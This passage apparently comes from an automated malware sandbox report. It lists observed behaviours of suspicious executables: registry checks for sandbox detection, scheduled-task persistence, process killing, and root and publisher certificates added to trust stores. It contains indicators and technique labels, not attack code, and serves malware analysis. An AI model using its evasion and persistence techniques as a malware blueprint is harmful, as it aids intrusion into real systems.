4492 WerFault.exe Adw.exe 1488 4492 WerFault.exe Adw.exe 2240 4492 WerFault.exe Adw.exe 3476 4492 WerFault.exe Adw.exe 1892 4492 WerFault.exe Adw.exe 1360 4492 WerFault.exe Adw.exe 4760 4492 WerFault.exe Adw.exe 2156 4492 WerFault.exe Adw.exe 1628 4492 WerFault.exe Adw.exe 4824 4492 WerFault.exe Adw.exe 4032 4492 WerFault.exe Adw.exe 3788 4492 WerFault.exe Adw.exe 1696 4492 WerFault.exe Adw.exe 3776 4492 WerFault.exe Adw.exe 3104 4492 WerFault.exe Adw.exe 1856 4492 WerFault.exe Adw.exe 4880 4492 WerFault.exe Adw.exe 4968 4492 WerFault.exe Adw.exe 4584 4492 WerFault.exe Adw.exe 1976 4492 WerFault.exe Adw.exe 4416 4492 WerFault.exe Adw.exe 4484 4492 WerFault.exe Adw.exe 4664 4492 WerFault.exe Adw.exe 3424 4492 WerFault.exe Adw.exe 2516 4492 WerFault.exe Adw.exe 432 4492 WerFault.exe Adw.exe 3740 4492 WerFault.exe Adw.exe 3440 4492 WerFault.exe Adw.exe 5036 4492 WerFault.exe Adw.exe 2856 4492 WerFault.exe Adw.exe 4288 4492 WerFault.exe Adw.exe 5032 4492 WerFault.exe Adw.exe 3480 4492 WerFault.exe Adw.exe 2944 4492 WerFault.exe Adw.exe 3260 4580 WerFault.exe ZZBe6j.exe 2456 4492 WerFault.exe Adw.exe 4128 4492 WerFault.exe Adw.exe 3304 4492 WerFault.exe Adw.exe 3368 4492 WerFault.exe Adw.exe 1776 4492 WerFault.exe Adw.exe 456 4492 WerFault.exe Adw.exe -
Checks SCSI registry key(s) 3 TTPs 41 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
DrvInst.exetapinstall.exesvchost.exetapinstall.exetaskmgr.exesvchost.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000 DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\LowerFilters DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\HardwareID svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Service DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Filters DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\LowerFilters DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Filters DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\UpperFilters DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\HardwareID tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\CompatibleIDs tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\UpperFilters DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Phantom svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\HardwareID tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Service DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\CompatibleIDs tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\CompatibleIDs svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Phantom svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags svchost.exe -
Checks processor information in registry 2 TTPs 5 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
DnsService.exeAewupLCiG.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 DnsService.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString DnsService.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 AewupLCiG.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString AewupLCiG.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz AewupLCiG.exe -
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 1956 schtasks.exe 1944 schtasks.exe 2352 schtasks.exe 4544 schtasks.exe 1852 schtasks.exe 2668 schtasks.exe 3104 schtasks.exe 3988 schtasks.exe 1720 schtasks.exe 2340 schtasks.exe 4264 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 4752 timeout.exe -
Enumerates system info in registry 2 TTPs 7 IoCs
Processes:
msedge.exeqnNFsBc8mC239HI4ICw.exerundll32.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS qnNFsBc8mC239HI4ICw.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName qnNFsBc8mC239HI4ICw.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid process 8 taskkill.exe 4592 taskkill.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
mask_svc.exepowershell.exesvchost.exepowershell.exerundll32.exeYyVGcMl.exedescription ioc process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-82 = "Atlantic Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-11 = "Azores Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-741 = "New Zealand Daylight Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-181 = "Mountain Daylight Time (Mexico)" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-1871 = "Russia TZ 7 Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-2752 = "Tomsk Standard Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-1862 = "Russia TZ 6 Standard Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-2392 = "Aleutian Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-132 = "US Eastern Standard Time" mask_svc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" YyVGcMl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-982 = "Kamchatka Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-621 = "Korea Daylight Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-121 = "SA Pacific Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-3142 = "South Sudan Standard Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-2181 = "Astrakhan Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-2491 = "Aus Central W. Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-104 = "Central Brazilian Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-172 = "Central Standard Time (Mexico)" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-742 = "New Zealand Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-3052 = "Qyzylorda Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-792 = "SA Western Standard Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing YyVGcMl.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-771 = "Montevideo Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-831 = "SA Eastern Daylight Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-211 = "Pacific Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-561 = "SE Asia Daylight Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-152 = "Central America Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-361 = "GTB Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-2631 = "Norfolk Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-1411 = "Syria Daylight Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-512 = "Central Asia Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-931 = "Coordinated Universal Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-142 = "Canada Central Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-341 = "Egypt Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-301 = "Romance Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-932 = "Coordinated Universal Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-631 = "Tokyo Daylight Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ YyVGcMl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-222 = "Alaskan Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-231 = "Hawaiian Daylight Time" mask_svc.exe -
Modifies registry class 6 IoCs
Processes:
vpn.tmpmsedge.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BE49FBDF-9D0C-4705-9235-FD3A1AF3C76A} vpn.tmp Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BE49FBDF-9D0C-4705-9235-FD3A1AF3C76A}\ProxyStubClsid32\ = "{94512587-22D8-4197-B757-6BA2F3DE6DEC}" vpn.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BE49FBDF-9D0C-4705-9235-FD3A1AF3C76A}\ProxyStubClsid32 vpn.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node vpn.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface vpn.tmp -
Processes:
tapinstall.exevpn.tmpdescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 tapinstall.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 tapinstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC tapinstall.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0f00000001000000140000001b4e387db74a69a0470cb08f598beb3b511617530300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be tapinstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA vpn.tmp Set value (data) 